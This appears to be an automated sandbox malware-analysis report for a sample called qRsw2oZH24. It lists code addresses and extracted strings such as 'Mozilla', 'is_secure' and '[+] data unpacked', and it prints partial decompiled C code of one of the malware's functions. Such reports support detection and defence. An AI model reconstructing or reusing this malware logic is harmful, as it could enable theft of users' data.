                                    0x008286ca
                                    0x008286d0
                                    0x008286d9
                                    0x008286e0
                                    0x008286e3
                                    0x008286e6
                                    0x008286eb
                                    0x008286ef
                                    0x008286f6
                                    0x008286fb
                                    0x008286ff
                                    0x00828705
                                    0x00828709
                                    0x0082870f
                                    0x00828717
                                    0x0082871c
                                    0x00828724
                                    0x0082872f
                                    0x00828739
                                    0x0082873f
                                    0x00828745
                                    0x00828724
                                    0x00828746
                                    0x0082874d
                                    0x0082875e
                                    0x0082876d
                                    0x00828772
                                    0x0082877e
                                    0x00828785
                                    0x0082878a
                                    0x00828796
                                    0x0082879d
                                    0x008287a5
                                    0x008287b2
                                    0x008287be
                                    0x008287c8
                                    0x008287d0
                                    0x008287da
                                    0x008287da
                                    0x008287dd
                                    0x008287de
                                    0x008287e1
                                    0x008287f1
                                    0x008287fb
                                    0x00828800
                                    0x00828801
                                    0x00828805
                                    0x00828809
                                    0x0082880b
                                    0x0082880b
                                    0x0082880e
                                    0x0082880f
                                    0x00828818
                                    0x00828826
                                    0x00828831
                                    0x0082883c
                                    0x00828847
                                    0x00828852
                                    0x0082885d
                                    0x00828868
                                    0x00828870
                                    0x0082887b
                                    0x00828880
                                    0x00828880
                                    0x0082888c
                                    0x00000000
                                    0x0082874f
                                    0x0082874f
                                    0x0082874f
                                    0x00828751
                                    0x00828751
                                    0x00828758
                                    0x00828759
                                    0x00828759
                                    0x00000000
                                    0x00828751
                                    0x008286aa
                                    0x008286aa
                                    0x008286aa
                                    0x008286ac
                                    0x008286ac
                                    0x008286b3
                                    0x008286b4
                                    0x008286b4
                                    0x00000000
                                    0x008286ac
                                    0x008286a8
                                    0x008285b2
                                    0x008285b7
                                    0x008285be
                                    0x008285c4
                                    0x008285ca
                                    0x008285d2
                                    0x008285d7
                                    0x008285de
                                    0x008285df
                                    0x008285e1
                                    0x008285e4
                                    0x008285f2
                                    0x008285f8
                                    0x008285fe
                                    0x00828604
                                    0x008285df
                                    0x00828605
                                    0x0082860c
                                    0x0082861d
                                    0x0082861d
                                    0x00000000
                                    0x0082860e
                                    0x0082860e
                                    0x0082860e
                                    0x00828610
                                    0x00828610
                                    0x00828617
                                    0x00828618
                                    0x00828618
                                    0x00000000
                                    0x00828610
                                    0x0082858f
                                    0x0082858f
                                    0x0082858f
                                    0x00828591
                                    0x00828591
                                    0x00828598
                                    0x00828599
                                    0x00828599
                                    0x00000000
                                    0x00828591
                                    0x0082858d
                                    0x00828008
                                    0x0082800d
                                    0x0082800e
                                    0x00828015
                                    0x00828016
                                    0x0082801c
                                    0x0082801f
                                    0x00000000
                                    0x00000000
                                    0x00828025
                                    0x0082802c
                                    0x00828032
                                    0x00828039
                                    0x00828043
                                    0x0082804a
                                    0x00828051
                                    0x00828053
                                    0x00828058
                                    0x0082805e
                                    0x00828065
                                    0x0082806a
                                    0x00828072
                                    0x00828074
                                    0x00828077
                                    0x0082807f
                                    0x00828084
                                    0x0082808a
                                    0x0082808f
                                    0x00828096
                                    0x0082809b
                                    0x00828072
                                    0x0082809c
                                    0x008280a3
                                    0x008280b4
                                    0x008280bc
                                    0x008280c1
                                    0x008280c3
                                    0x008280c4
                                    0x008280c6
                                    0x008280e7
                                    0x008280ea
                                    0x008280f0
                                    0x008280f4
                                    0x00828102
                                    0x00828107
                                    0x0082810c
                                    0x00828114
                                    0x00828117
                                    0x0082811a
                                    0x00828128
                                    0x0082812d
                                    0x00828133
                                    0x00828136
                                    0x00828138
                                    0x0082813a
                                    0x0082813e
                                    0x00828142
                                    0x00828142
                                    0x0082814d
                                    0x008280c8
                                    0x008280d6
                                    0x008280d6
                                    0x00828152
                                    0x0082815d
                                    0x00828162
                                    0x00828164
                                    0x0082816c
                                    0x00828177
                                    0x0082817a
                                    0x0082817d
                                    0x00828185
                                    0x0082819c
                                    0x008281a9
                                    0x008281ad
                                    0x008281b8
                                    0x008281c0
                                    0x008281c4
                                    0x008281cb
                                    0x008281d6
                                    0x008281d9
                                    0x008281dc
                                    0x008281e4
                                    0x008281f4
                                    0x00828201
                                    0x00828205
                                    0x00828210
                                    0x00828218
                                    0x0082821c
                                    0x00828223
                                    0x0082822e
                                    0x00828231
                                    0x00828234
                                    0x0082823c
                                    0x00828253
                                    0x00828260
                                    0x00828264
                                    0x0082826f
                                    0x00828277
                                    0x0082827b
                                    0x00828282
                                    0x0082828d
                                    0x00828290
                                    0x00828293
                                    0x0082829b
                                    0x008282b2
                                    0x008282bf
                                    0x008282c3
                                    0x008282ce
                                    0x008282d6
                                    0x008282da
                                    0x008282e1
                                    0x008282ec
                                    0x008282ef
                                    0x008282f2
                                    0x008282fa
                                    0x00828311
                                    0x0082831e
                                    0x00828322
                                    0x0082832d
                                    0x00828335
                                    0x00828339
                                    0x00828340
                                    0x0082834b
                                    0x0082834e
                                    0x00828351
                                    0x00828359
                                    0x00828370
                                    0x0082837d
                                    0x00828381
                                    0x0082838c
                                    0x00828394
                                    0x00828398
                                    0x0082839d
                                    0x008283a2
                                    0x008283ae
                                    0x008283bb
                                    0x008283bf
                                    0x008283ca
                                    0x008283cf
                                    0x008283cf
                                    0x008283cf
                                    0x008283db
                                    0x008283e0
                                    0x00000000
                                    0x008280a5
                                    0x008280a5
                                    0x008280a5
                                    0x008280a7
                                    0x008280a7
                                    0x008280ae
                                    0x008280af
                                    0x008280af
                                    0x00000000
                                    0x008280a7
                                    0x008280a3
                                    0x00828408
                                    0x00000000
                                    0x00827f69
                                    0x00827f69
                                    0x00827f69
                                    0x00827f6b
                                    0x00827f6b
                                    0x00827f72
                                    0x00827f73
                                    0x00827f73
                                    0x00000000
                                    0x00827f6b
                                    0x00827f67
                                    0x00827ef9
                                    0x00827ef9
                                    0x00827efb
                                    0x00827efb
                                    0x00827eff
                                    0x00827f00
                                    0x00827f00
                                    0x00000000
                                    0x00827efb
                                    0x00827ec4
                                    0x00827ec9
                                    0x00827ecd
                                    0x00827edb
                                    0x00827ee2
                                    0x00000000
                                    0x00827ee2
                                    0x00827ecf
                                    0x00827ecf
                                    0x00827ed1
                                    0x00827ed1
                                    0x00827ed5
                                    0x00827ed6
                                    0x00827ed6
                                    0x00000000
                                    0x00827ea6
                                    0x00827ea6
                                    0x00827ea6
                                    0x00827ead
                                    0x00827eae
                                    0x00827eae
                                    0x00000000
                                    0x00827ea6
                                    0x00827ea4
                                    0x008273d0
                                    0x00000000
                                    0x008273d6
                                    0x008273dd
                                    0x008273e4
                                    0x008273e9
                                    0x008273f0
                                    0x008273f2
                                    0x008273f9
                                    0x00827400
                                    0x0082740d
                                    0x00827415
                                    0x0082741a
                                    0x00827422
                                    0x00827430
                                    0x0082743a
                                    0x00827440
                                    0x00827446
                                    0x00827422
                                    0x00827447
                                    0x00827450
                                    0x00827461
                                    0x00827470
                                    0x00827475
                                    0x0082747a
                                    0x0082747f
                                    0x0082772e
                                    0x00827735
                                    0x0082773a
                                    0x00827741
                                    0x00827748
                                    0x0082774f
                                    0x00827756
                                    0x0082775c
                                    0x00827764
                                    0x00827769
                                    0x00827771
                                    0x0082777f
                                    0x00827789
                                    0x0082778f
                                    0x00827795
                                    0x00827771
                                    0x00827796
                                    0x0082779d
                                    0x008277ae
                                    0x008277b8
                                    0x008277bd
                                    0x00000000
                                    0x0082779f
                                    0x0082779f
                                    0x008277a1
                                    0x008277a1
                                    0x008277a8
                                    0x008277a9
                                    0x008277a9
                                    0x00000000
                                    0x008277a1
                                    0x00827485
                                    0x00827485
                                    0x00827488
                                    0x00827489
                                    0x00827492
                                    0x00000000
                                    0x00000000
                                    0x0082749a
                                    0x0082749e
                                    0x008274a7
                                    0x008274ba
                                    0x008274c0
                                    0x008274c6
                                    0x008274d1
                                    0x008274db
                                    0x008274e0
                                    0x008274e2
                                    0x008274e5
                                    0x008274ef
                                    0x008274f9
                                    0x00827503
                                    0x0082750a
                                    0x0082750c
                                    0x00827511
                                    0x0082751a
                                    0x00827521
                                    0x00827526
                                    0x0082752d
                                    0x0082752e
                                    0x00827540
                                    0x00827541
                                    0x00827542
                                    0x00827543
                                    0x00827548
                                    0x0082754f
                                    0x00827554
                                    0x00827557
                                    0x0082755a
                                    0x0082755b
                                    0x0082755b
                                    0x00827565
                                    0x00827576
                                    0x00827582
                                    0x0082758f
                                    0x00827599
                                    0x008275a5
                                    0x008275a9
                                    0x008275b4
                                    0x008275bf
                                    0x008275ca
                                    0x008275d5
                                    0x008275d9
                                    0x008275e1
                                    0x008275ea
                                    0x008275fd
                                    0x00827603
                                    0x00827609
                                    0x00827614
                                    0x0082761e
                                    0x00827623
                                    0x00827625
                                    0x00827628
                                    0x0082762c
                                    0x00827631
                                    0x00827638
                                    0x0082763f
                                    0x0082764b
                                    0x00827652
                                    0x00827657
                                    0x0082765e
                                    0x0082765f
                                    0x0082766e
                                    0x0082766f
                                    0x00827670
                                    0x00827672
                                    0x00827677
                                    0x0082767e
                                    0x00827683
                                    0x00827686
                                    0x00827687
                                    0x00827687
                                    0x0082768a
                                    0x00827693
                                    0x008276a4
                                    0x008276bb
                                    0x008276bd
                                    0x008276c7
                                    0x008276d3
                                    0x008276d7
                                    0x008276e2
                                    0x008276ed
                                    0x008276f8
                                    0x00827703
                                    0x00827708
                                    0x0082770e
                                    0x00000000
                                    0x00827695
                                    0x00827695
                                    0x00827697
                                    0x00827697
                                    0x0082769e
                                    0x0082769f
                                    0x0082769f
                                    0x00000000
                                    0x00827697
                                    0x00827693
                                    0x00827567
                                    0x00827569
                                    0x00827569
                                    0x00827570
                                    0x00827571
                                    0x00827571
                                    0x00000000
                                    0x00827569
                                    0x008277c0
                                    0x008277c1
                                    0x008277c7
                                    0x008277cc
                                    0x008277d0
                                    0x008277ef
                                    0x008277f3
                                    0x00827800
                                    0x00827805
                                    0x00827808
                                    0x0082780a
                                    0x00000000
                                    0x00000000
                                    0x00827810
                                    0x00827817
                                    0x0082781e
                                    0x00827823
                                    0x0082782a
                                    0x0082782c
                                    0x00827836
                                    0x00827840
                                    0x00827849
                                    0x0082784f
                                    0x00827856
                                    0x0082785b
                                    0x00827863
                                    0x00827871
                                    0x0082787b
                                    0x00827880
                                    0x00827887
                                    0x0082788c
                                    0x00827863
                                    0x0082788d
                                    0x00827894
                                    0x008278a3
                                    0x008278ad
                                    0x008278b2
                                    0x008278b2
                                    0x008278b6
                                    0x008278bc
                                    0x008278bf
                                    0x00000000
                                    0x00000000
                                    0x008278c8
                                    0x008278d6
                                    0x008278d9
                                    0x008278df
                                    0x008278e3
                                    0x008278f1
                                    0x008278f6
                                    0x008278fb
                                    0x00827903
                                    0x00827906
                                    0x00827909
                                    0x00827917
                                    0x0082791c
                                    0x0082791f
                                    0x00827922
                                    0x00827926
                                    0x00827928
                                    0x0082792d
                                    0x00827934
                                    0x0082793b
                                    0x00827941
                                    0x00827945
                                    0x00827948
                                    0x0082794e
                                    0x00827955
                                    0x0082795a
                                    0x00827961
                                    0x00827962
                                    0x00827971
                                    0x00827972
                                    0x00827973
                                    0x00827975
                                    0x00827976
                                    0x0082797b
                                    0x00827982
                                    0x00827987
                                    0x0082798a
                                    0x00827962
                                    0x0082798b
                                    0x00827992
                                    0x008279a3
                                    0x008279b0
                                    0x008279b3
                                    0x008279c0
                                    0x008279c5
                                    0x008279c8
                                    0x008279cb
                                    0x008279ce
                                    0x008279d3
                                    0x008279d6
                                    0x008279da
                                    0x008279df
                                    0x008279e6
                                    0x008279ed
                                    0x008279f3
                                    0x008279fa
                                    0x008279ff
                                    0x00827a07
                                    0x00827a14
                                    0x00827a19
                                    0x00827a1f
                                    0x00827a24
                                    0x00827a2b
                                    0x00827a30
                                    0x00827a07
                                    0x00827a31
                                    0x00827a38
                                    0x00827a49
                                    0x00827a4c
                                    0x00827a55
                                    0x00827a64
                                    0x00827a6a
                                    0x00827a70
                                    0x00827a7b
                                    0x00827a8a
                                    0x00827a8d
                                    0x00827a90
                                    0x00827a94
                                    0x00827a99
                                    0x00827aa0
                                    0x00827aa7
                                    0x00827aab
                                    0x00827ab1
                                    0x00827ab8
                                    0x00827abd
                                    0x00827ac4
                                    0x00827ac5
                                    0x00827ad4
                                    0x00827ad5
                                    0x00827ad6
                                    0x00827ad7
                                    0x00827adc
                                    0x00827ae3
                                    0x00827ae8
                                    0x00827ae9
                                    0x00827ae9
                                    0x00827aec
                                    0x00827af3
                                    0x00827b04
                                    0x00827b04
                                    0x00827b09
                                    0x00827b10
                                    0x00827b17
                                    0x00827b1e
                                    0x00827b22
                                    0x00827b28
                                    0x00827b2f
                                    0x00827b34
                                    0x00827b3b
                                    0x00827b3c
                                    0x00827b4b
                                    0x00827b4c
                                    0x00827b4d
                                    0x00827b4e
                                    0x00827b4f
                                    0x00827b54
                                    0x00827b5b
                                    0x00827b60
                                    0x00827b3c
                                    0x00827b61
                                    0x00827b68
                                    0x00827b79
                                    0x00827b88
                                    0x00827b95
                                    0x00827b9f
                                    0x00827bac
                                    0x00827bb6
                                    0x00827bc3
                                    0x00827bcd
                                    0x00827bda
                                    0x00827be4
                                    0x00827bf1
                                    0x00827bfb
                                    0x00827c04
                                    0x00827c12
                                    0x00827c1a
                                    0x00827c20
                                    0x00827c2e
                                    0x00827c38
                                    0x00827c45
                                    0x00827c4f
                                    0x00827c58
                                    0x00827c5c
                                    0x00827c5d
                                    0x00827c67
                                    0x00827c6c
                                    0x00827c72
                                    0x00827c80
                                    0x00827c8a
                                    0x00827c95
                                    0x00827c9f
                                    0x00827cac
                                    0x00827cb6
                                    0x00827cc3
                                    0x00827ccd
                                    0x00827cd3
                                    0x00827ce4
                                    0x00827cef
                                    0x00827cf7
                                    0x00827cfd
                                    0x00827d07
                                    0x00827d13
                                    0x00827d17
                                    0x00827d22
                                    0x00827d2d
                                    0x00827d38
                                    0x00827d43
                                    0x00827d4e
                                    0x00827d59
                                    0x00827d64
                                    0x00827d6f
                                    0x00827d7a
                                    0x00827d85
                                    0x00827d90
                                    0x00827d9b
                                    0x00827da6
                                    0x00827db1
                                    0x00827dbc
                                    0x00827dc7
                                    0x00827dd2
                                    0x00827ddd
                                    0x00827de5
                                    0x00827df0
                                    0x00827df5
                                    0x00827dfb
                                    0x00827e02
                                    0x00000000
                                    0x00827b6a
                                    0x00827b6a
                                    0x00827b6a
                                    0x00827b6c
                                    0x00827b6c
                                    0x00827b73
                                    0x00827b74
                                    0x00827b74
                                    0x00000000
                                    0x00827b6c
                                    0x00827af5
                                    0x00827af5
                                    0x00827af5
                                    0x00827af7
                                    0x00827af7
                                    0x00827afe
                                    0x00827aff
                                    0x00827aff
                                    0x00000000
                                    0x00827af7
                                    0x00827a3a
                                    0x00827a3a
                                    0x00827a3a
                                    0x00827a3c
                                    0x00827a3c
                                    0x00827a43
                                    0x00827a44
                                    0x00827a44
                                    0x00000000
                                    0x00827a3c
                                    0x00827994
                                    0x00827994
                                    0x00827994
                                    0x00827996
                                    0x00827996
                                    0x0082799d
                                    0x0082799e
                                    0x0082799e
                                    0x00000000
                                    0x00827996
                                    0x00827992
                                    0x00000000
                                    0x00827896
                                    0x00827896
                                    0x00827896
                                    0x0082789d
                                    0x0082789e
                                    0x0082789e
                                    0x00000000
                                    0x00827896
                                    0x00827894
                                    0x008277d2
                                    0x008277d4
                                    0x008277d4
                                    0x008277d8
                                    0x008277df
                                    0x008277e3
                                    0x008277e7
                                    0x008277ea
                                    0x008277ea
                                    0x00000000
                                    0x008277d4
                                    0x00827452
                                    0x00827452
                                    0x00827454
                                    0x00827454
                                    0x0082745b
                                    0x0082745c
                                    0x0082745c
                                    0x00000000
                                    0x00827454
                                    0x00827450
                                    0x008273d0

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalDeallocateSection$EnterLeave__fread_nolock
                                    • String ID: $.$.$.$.$.$.$.$.$.$C$CLK\$FALSE$MEKJ$Mozilla$NULL,secure$[+] data unpacked$[-] data unpacked failed$[@^O$] - [user: $]KM[\K$cATGBBO.$is_secure$ru$secure$sqMAAEGK]
                                    • API String ID: 1177441120-1452042179
                                    • Opcode ID: 218710319b33c1d8353a5c20b74492a224a6c3876029da31ba9658ac4d87bd4e
                                    • Instruction ID: 391ba5e03a23b116990a25de25d827fda849eb5a86ebc46328d5aad5a4b6c86e
                                    • Opcode Fuzzy Hash: 218710319b33c1d8353a5c20b74492a224a6c3876029da31ba9658ac4d87bd4e
                                    • Instruction Fuzzy Hash: 2413C030D042A8DEDB15EBA8E946BEDBBB0FF15300F2041A9E115E7292DF745AC5CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00823E7B Relevance: 28.5, APIs: 2, Strings: 13, Instructions: 2285COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 79%
                                    			E00823E7B(void* __ebx, void* __ecx, intOrPtr __edx, void* __eflags) {
				void* __edi;
				intOrPtr _t800;
				intOrPtr _t801;
				signed int _t802;
				intOrPtr _t808;
				intOrPtr _t809;
				intOrPtr _t810;
				intOrPtr _t812;
				intOrPtr _t814;
				void* _t815;
				void* _t817;
				void* _t818;
				void* _t832;
				void* _t833;
				void* _t835;
				intOrPtr _t842;
				void* _t843;
				intOrPtr _t847;
				intOrPtr _t848;
				intOrPtr _t851;
				intOrPtr _t854;
				intOrPtr _t857;
				intOrPtr _t860;
				intOrPtr _t863;
				intOrPtr _t866;
				intOrPtr _t869;
				intOrPtr _t872;
				intOrPtr _t875;
				intOrPtr _t877;
				intOrPtr _t880;
				intOrPtr _t883;
				intOrPtr _t886;
				intOrPtr _t889;
				intOrPtr _t892;
				intOrPtr _t895;
				intOrPtr _t898;
				intOrPtr _t901;
				intOrPtr _t904;
				intOrPtr _t906;
				intOrPtr _t908;
				intOrPtr _t910;
				intOrPtr _t914;
				signed int _t916;
				intOrPtr _t917;
				intOrPtr _t918;
				intOrPtr _t919;
				intOrPtr _t920;
				intOrPtr _t922;
				intOrPtr _t923;
				void* _t924;
				intOrPtr _t926;
				intOrPtr _t927;
				void* _t929;
				void* _t930;
				void* _t931;
				void* _t933;
				void* _t934;
				void* _t935;
				void* _t936;
				void* _t937;
				void* _t938;
				void* _t939;
				void* _t940;
				void* _t941;
				void* _t942;
				void* _t943;
				void* _t944;
				void* _t945;
				void* _t947;
				void* _t949;
				void* _t950;
				void* _t952;
				void* _t953;
				void* _t955;
				void* _t956;
				void* _t958;
				void* _t959;
				void* _t961;
				void* _t962;
				void* _t963;
				void* _t964;
				void* _t965;
				void* _t966;
				void* _t967;
				void* _t968;
				void* _t969;
				void* _t970;
				void* _t971;
				void* _t972;
				void* _t973;
				void* _t974;
				void* _t975;
				void* _t976;
				void* _t977;
				void* _t978;
				void* _t979;
				void* _t980;
				void* _t981;
				void* _t982;
				void* _t983;
				void* _t984;
				void* _t985;
				void* _t986;
				void* _t987;
				void* _t988;
				void* _t989;
				void* _t990;
				void* _t991;
				void* _t992;
				void* _t994;
				void* _t995;
				void* _t996;
				void* _t997;
				void* _t998;
				void* _t999;
				void* _t1000;
				void* _t1001;
				void* _t1002;
				void* _t1003;
				void* _t1004;
				void* _t1005;
				void* _t1006;
				void* _t1007;
				void* _t1008;
				void* _t1009;
				void* _t1010;
				void* _t1011;
				void* _t1012;
				void* _t1013;
				void* _t1014;
				void* _t1015;
				void* _t1016;
				void* _t1017;
				void* _t1018;
				void* _t1019;
				void* _t1020;
				void* _t1021;
				void* _t1022;
				void* _t1023;
				void* _t1024;
				void* _t1025;
				void* _t1026;
				void* _t1028;
				intOrPtr _t1144;
				void* _t1145;
				void* _t1149;
				void* _t1155;
				void* _t1159;
				void* _t1164;
				void* _t1168;
				void* _t1172;
				void* _t1176;
				void* _t1182;
				void* _t1186;
				void* _t1190;
				void* _t1194;
				void* _t1198;
				void* _t1203;
				void* _t1207;
				void* _t1211;
				void* _t1215;
				void* _t1219;
				void* _t1223;
				void* _t1227;
				void* _t1231;
				void* _t1236;
				void* _t1240;
				void* _t1244;
				void* _t1249;
				void* _t1253;
				void* _t1257;
				void* _t1261;
				void* _t1265;
				void* _t1271;
				void* _t1275;
				void* _t1279;
				void* _t1284;
				void* _t1288;
				void* _t1292;
				CHAR* _t1296;
				CHAR* _t1302;
				signed int _t1310;
				signed int _t1311;
				void* _t1312;
				void* _t1321;
				void* _t1322;
				void* _t1323;
				void* _t1352;
				char* _t1358;
				char* _t1360;
				char* _t1367;
				intOrPtr _t1687;
				void* _t1688;
				intOrPtr _t1690;
				void* _t1699;
				void* _t1705;
				void* _t1707;
				void* _t1709;
				void* _t1710;
				void* _t1716;
				void* _t1717;
				void* _t1719;
				void* _t1721;
				void* _t1723;
				void* _t1729;
				void* _t1731;
				void* _t1733;
				void* _t1735;
				void* _t1737;
				void* _t1739;
				void* _t1741;
				void* _t1746;
				void* _t1748;
				void* _t1753;
				void* _t1755;
				void* _t1757;
				void* _t1759;
				void* _t1761;
				void* _t1763;
				void* _t1765;
				void* _t1770;
				void* _t1771;
				void* _t1773;
				signed int _t1781;
				void* _t1785;
				void* _t1786;
				intOrPtr _t1790;
				intOrPtr _t1791;
				intOrPtr _t1792;
				intOrPtr _t1793;
				intOrPtr _t1794;
				void* _t1888;
				void* _t1889;
				intOrPtr _t1890;
				intOrPtr _t1922;
				char* _t1924;
				void* _t1928;
				void* _t1959;
				void* _t1961;
				intOrPtr* _t1962;
				intOrPtr* _t1963;
				intOrPtr _t1964;
				void* _t1969;
				intOrPtr _t1972;
				intOrPtr _t1976;
				void* _t1993;
				void* _t2002;
				void* _t2008;
				void* _t2014;
				void* _t2020;
				void* _t2026;
				void* _t2032;
				void* _t2038;
				void* _t2044;
				void* _t2049;
				void* _t2055;
				void* _t2061;
				void* _t2067;
				void* _t2073;
				void* _t2079;
				void* _t2085;
				void* _t2091;
				void* _t2097;
				void* _t2103;
				void* _t2109;
				void* _t2114;
				void* _t2119;
				void* _t2129;
				void* _t2134;
				void* _t2142;
				void* _t2147;

				_t1969 = __eflags;
				L00890CFC(0x8936b5, __ebx, __ecx, __edx);
				_t1962 = _t1961 - 0xd20;
				_push(__ebx);
				_push(_t1888);
				 *((intOrPtr*)(_t1959 - 0x10)) = _t1962;
				 *((intOrPtr*)(_t1959 - 4)) = 0;
				 *((intOrPtr*)(_t1959 - 0xdc)) = E0087534A(__ecx, __edx, 0);
				 *((intOrPtr*)(_t1959 - 0xd8)) = __edx;
				_t800 = E00875619(0, __ecx, __edx, _t1888, _t1969, _t1959 - 0xdc); // executed
				 *((intOrPtr*)(_t1959 - 0x68)) = _t800;
				_t801 = L00872C70(__edx);
				 *0x8b480c = _t801;
				_t802 = _t801 -  *0x8b4874;
				_t1781 = _t802 % 0x3e8;
				 *(_t1959 - 0x64) = _t802 / 0x3e8;
				GetModuleFileNameA(GetModuleHandleA(0), _t1959 - 0xd2c, 0x104);
				asm("movaps xmm0, [0x8a91f0]");
				asm("movups [ebp-0x28], xmm0");
				 *((intOrPtr*)(_t1959 - 0x18)) = 0x7c6b6768;
				_t1922 =  *((intOrPtr*)( *[fs:0x2c]));
				_t808 =  *0x8b5998; // 0x8000006b
				 *((char*)(_t1959 - 0x14)) = 0x2e;
				 *((intOrPtr*)(_t1959 - 0x2c)) = _t1922;
				if(_t808 >  *((intOrPtr*)(_t1922 + 4))) {
					E0086DB91(_t808, 0x8b5998);
					_t1971 =  *0x8b5998 - 0xffffffff;
					_pop(0x3e8);
					if( *0x8b5998 == 0xffffffff) {
						E0082D54D(0x8b53a0, _t1959 - 0x28);
						L0086DFE8(0x8b53a0, _t1971, 0x896011);
						L0086DB47(0x8b5998);
						_pop(0x3e8);
					}
				}
				_t1972 =  *0x8b53b4; // 0x0
				if(_t1972 == 0) {
					L6:
					_t809 = E0087614E(0x3e8, _t1781, _t1973, 0x8b53a0);
					asm("movaps xmm0, [0x8a9240]");
					 *((intOrPtr*)(_t1959 - 0x60)) = _t809;
					_t810 =  *0x8b5a4c; // 0x8000006c
					_pop(_t1321);
					asm("movups [ebp-0x84], xmm0");
					 *((intOrPtr*)(_t1959 - 0x74)) = 0x7b7a6d6b;
					 *((short*)(_t1959 - 0x70)) = 0x6b7c;
					 *((char*)(_t1959 - 0x6e)) = 0x2e;
					if(_t810 >  *((intOrPtr*)(_t1922 + 4))) {
						E0086DB91(_t810, 0x8b5a4c);
						_t1975 =  *0x8b5a4c - 0xffffffff;
						_pop(_t1321);
						if( *0x8b5a4c == 0xffffffff) {
							E0082D50F(0x8b5688, _t1959 - 0x84);
							L0086DFE8(0x8b5688, _t1975, 0x896021);
							L0086DB47(0x8b5a4c);
							_pop(_t1321);
						}
					}
					_t1976 =  *0x8b569e; // 0x0
					if(_t1976 == 0) {
						L12:
						 *((intOrPtr*)(_t1959 - 0x5c)) = E0087614E(_t1321, _t1781, _t1977, 0x8b5688);
						_t812 =  *0x8b4da8; // 0x8000006d
						_pop(_t1322);
						 *((intOrPtr*)(_t1959 - 0x20)) = 0x7e63616d;
						 *((intOrPtr*)(_t1959 - 0x1c)) = 0x7c6b7a7b;
						 *((intOrPtr*)(_t1959 - 0x18)) = 0x6b636f60;
						 *((char*)(_t1959 - 0x14)) = 0x2e;
						if(_t812 >  *((intOrPtr*)(_t1922 + 4))) {
							E0086DB91(_t812, 0x8b4da8);
							_t1979 =  *0x8b4da8 - 0xffffffff;
							_pop(_t1322);
							if( *0x8b4da8 == 0xffffffff) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsb");
								L0086DFE8(_t1322, _t1979, 0x896033);
								L0086DB47(0x8b4da8);
								_t1922 =  *((intOrPtr*)(_t1959 - 0x2c));
								_pop(_t1322);
							}
						}
						if( *0x8b4ed0 == 0) {
							L18:
							_t1310 = E0087614E(_t1322, _t1781, _t1982, 0x8b4ec4);
							 *((intOrPtr*)(_t1959 - 0x1c)) = 0x7c6b7d7b;
							_t814 =  *0x8b5174; // 0x8000006e
							_pop(_t1323);
							 *((intOrPtr*)(_t1959 - 0x18)) = 0x6b636f60;
							 *((char*)(_t1959 - 0x14)) = 0x2e;
							if(_t814 >  *((intOrPtr*)(_t1922 + 4))) {
								E0086DB91(_t814, 0x8b5174);
								_t1984 =  *0x8b5174 - 0xffffffff;
								_pop(_t1323);
								if( *0x8b5174 == 0xffffffff) {
									asm("movsd");
									asm("movsd");
									asm("movsb");
									L0086DFE8(_t1323, _t1984, 0x896041);
									 *_t1962 = 0x8b5174;
									L0086DB47();
									_pop(_t1323);
								}
							}
							if( *0x8b6030 == 0) {
								L24:
								_t815 = E0087614E(_t1323, _t1781, _t1987, 0x8b6028);
								 *(_t1959 - 0xfc) =  *(_t1959 - 0xfc) & 0x00000000;
								 *((intOrPtr*)(_t1959 - 0xf8)) = 0xf;
								 *((char*)(_t1959 - 0x10c)) = 0;
								L0082DFE8(_t815);
								 *((char*)(_t1959 - 4)) = 1;
								_t817 = E0082E917(_t1959 - 0x13c, _t1959 - 0x10c, _t1987, _t1310);
								 *((char*)(_t1959 - 4)) = 2;
								_t818 = E0082E917(_t1959 - 0x154, _t817, _t1987,  *((intOrPtr*)(_t1959 - 0x5c)));
								 *((char*)(_t1959 - 4)) = 3;
								E0082E917(_t1959 - 0xf4, _t818, _t1987,  *((intOrPtr*)(_t1959 - 0x60)));
								 *((char*)(_t1959 - 4)) = 4;
								E008184E6(_t1959 - 0xc28);
								_t822 =  >=  ?  *((void*)(_t1959 - 0xf4)) : _t1959 - 0xf4;
								L00818C42(_t1959 - 0xc28,  >=  ?  *((void*)(_t1959 - 0xf4)) : _t1959 - 0xf4,  *((intOrPtr*)(_t1959 - 0xe4)));
								L00818CE4(_t1959 - 0xc28);
								L00818D64(_t1959 - 0xc28, _t1959 - 0x22c);
								E0082DF41(_t1959 - 0xf4);
								E0082DF41(_t1959 - 0x154);
								E0082DF41(_t1959 - 0x13c);
								 *((char*)(_t1959 - 4)) = 8;
								E0082DF41(_t1959 - 0x10c);
								_t1785 = 4;
								_t1889 = L00818F5D(_t1310, _t1959 - 0x28c, _t1785);
								_t1786 = 0x14;
								 *((char*)(_t1959 - 4)) = 9;
								_t832 = L00818F5D(_t1310, _t1959 - 0x274, _t1786);
								 *((char*)(_t1959 - 4)) = 0xa;
								_t833 = E0082E8C7(_t1310, _t1959 - 0x25c, 0x8b2a8c, _t1889);
								 *((char*)(_t1959 - 4)) = 0xb;
								E0082FA3B(_t1959 - 0x28,  *((intOrPtr*)(_t1959 - 0x30)), _t833, _t832, "\\");
								 *((char*)(_t1959 - 4)) = 0xc;
								_t835 = E0082E917(_t1959 - 0x244, _t1959 - 0x28,  *((intOrPtr*)(_t1959 - 0xe0)) - 0x10, ".");
								_push(_t1889);
								_push(_t835);
								 *((char*)(_t1959 - 4)) = 0xd;
								_push( *((intOrPtr*)(_t1959 - 0x30)));
								E0082FA3B(_t1959 - 0x124);
								E0082DF41(_t1959 - 0x244);
								E0082DF41(_t1959 - 0x28);
								E0082DF41(_t1959 - 0x25c);
								E0082DF41(_t1959 - 0x274);
								 *((char*)(_t1959 - 4)) = 0x13;
								E0082DF41(_t1959 - 0x28c);
								_t842 = E00826506();
								 *((intOrPtr*)(_t1959 - 0x30)) = _t842;
